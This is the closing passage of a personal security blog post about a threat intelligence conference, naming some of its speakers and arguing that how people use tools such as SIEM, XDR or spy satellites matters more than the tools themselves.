Now, on the event itself, there were some great talks and presenters (which makes it even more humbling to be part of it). To give you an idea, speakers included Sir Alex Younger, former Chief of MI6, the CISOs of big U.S. cities like Los Angeles and New York, representatives of the Dutch High Tech Crime Unit, and of course lots and lots of experienced intelligence experts from both Recorded Future’s intelligence teams and other private companies. You can check the agenda here on your own.

To close this blog post, I’d like to leave you with something that is common knowledge but frequently forgotten… No matter how “smart” your technology is, it’s how people use it that matters.

Think about it from the public sector side too… You might have some super impressive spy satellites with SAR, CCD, dozens of sensors… And yet, what if all your analysts only ever use the optoelectronic and FLIR sensors? Does it matter?

So… Regardless of what technologies you have available, ensure that you make the most of what they offer. Whether this is your SIEM, your XDR, or even your spy satellites! :)

Written by xorl

October 27, 2021 at 13:17